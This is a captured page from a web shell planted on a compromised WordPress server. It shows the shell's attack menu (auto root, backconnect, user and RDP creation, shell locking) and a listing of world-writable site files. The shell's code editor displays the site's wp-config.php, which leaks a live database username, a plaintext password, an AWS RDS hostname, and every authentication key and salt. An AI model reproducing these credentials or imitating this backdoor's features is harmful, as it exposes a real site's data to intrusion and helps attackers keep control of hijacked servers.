Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.14.254.103
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
ru-website_copy /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxrwxrwx
cgi-bin
[ DIR ]
drwxrwxrwx
new
[ DIR ]
drwxrwxr-x
wp-admin
[ DIR ]
drwxrwxrwx
wp-content
[ DIR ]
drwxrwxrwx
wp-includes
[ DIR ]
drwxrwxrwx
.htaccess
557
B
-rw-r--r--
.ru-website_copy.php
3.61
KB
-rw-r--r--
403.shtml
0
B
-rwxrwxrwx
404.shtml
0
B
-rwxrwxrwx
error_log
8.55
KB
-rwxrwxrwx
index.php
405
B
-rwxrwxrwx
license.txt
19.45
KB
-rwxrwxrwx
readme.html
7.17
KB
-rwxrwxrwx
robots.txt
31
B
-rwxrwxrwx
wp-activate.php
7
KB
-rwxrwxrwx
wp-blog-header.php
351
B
-rwxrwxrwx
wp-cli.yml
29
B
-rwxrwxrwx
wp-comments-post.php
2.27
KB
-rwxrwxrwx
wp-config-sample.php
2.93
KB
-rwxrwxrwx
wp-config.bak-a2.php
3.24
KB
-rwxrwxrwx
wp-config.php
3.51
KB
-rwxrwxrwx
wp-cron.php
3.85
KB
-rwxrwxrwx
wp-links-opml.php
2.44
KB
-rwxrwxrwx
wp-load.php
3.81
KB
-rwxrwxrwx
wp-login.php
44.4
KB
-rwxrwxrwx
wp-mail.php
8.31
KB
-rwxrwxrwx
wp-settings.php
21.77
KB
-rwxrwxrwx
wp-signup.php
30.95
KB
-rwxrwxrwx
wp-trackback.php
4.64
KB
-rwxrwxrwx
wpt-hotlinked-image-stub.png
12.59
KB
-rwxrwxrwx
xmlrpc.php
3.16
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-config.php
<?php //Begin Really Simple SSL session cookie settings @ini_set('session.cookie_httponly', true); @ini_set('session.cookie_secure', true); @ini_set('session.use_only_cookies', true); //END Really Simple SSL // BEGIN A2 CONFIG define('DISALLOW_FILE_EDIT', true); // END A2 CONFIG // BEGIN A2 CRON DISABLE define('DISABLE_WP_CRON', true); // END A2 CRON DISABLE /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'rur_website' ); /** MySQL database username */ define( 'DB_USER', 'admin' ); /** MySQL database password */ define( 'DB_PASSWORD', 'T0g3th3r@all' ); /** MySQL hostname */ define( 'DB_HOST', 'logisys.cluster-cv9maxyrxjgg.ap-south-1.rds.amazonaws.com' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'voqiyjv8nuwtdapabseewidyapl5zxkgotreycdc3hvm5xyjlsv9clbajply2mc5' ); define( 'SECURE_AUTH_KEY', '97vhit7vcy2wvnibtwkgo69wgxkp0rz6jiiaqbdsvtgd1jan6naoo52vc40svhgx' ); define( 'LOGGED_IN_KEY', '4v0aqobo3gunkywofmixxviyj7bxy0z2obomsnddsgdfrxqwujrdw8qrxse0cie8' ); define( 'NONCE_KEY', '8ndokmvbwe4pmwuypj6plocyq2w0evtynxnu6n2vanunet8pl00gayeqqpycj4yg' ); define( 'AUTH_SALT', 'mgfxblndvci05wovfasiz3jfrn5jevc2eifxmzicsy0ko9yzj6au39kzrlpbvfrg' ); define( 'SECURE_AUTH_SALT', 'ffc0pgjntbchkeloemmpphksz4jnjgzghz5trzfxdvgzxuvlea4yaisfjlxwr6i5' ); define( 'LOGGED_IN_SALT', 'wcivfekthlf31fyy2krzyrl1riti8y0cp9xlcdxr81przpnojrleuwilwwgqypll' ); define( 'NONCE_SALT', 'gk1enxr8jda90zgfeuh5az6tvcwkimmp4uagzeczhcujqrefaht3jmtiashluaso' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', true ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Close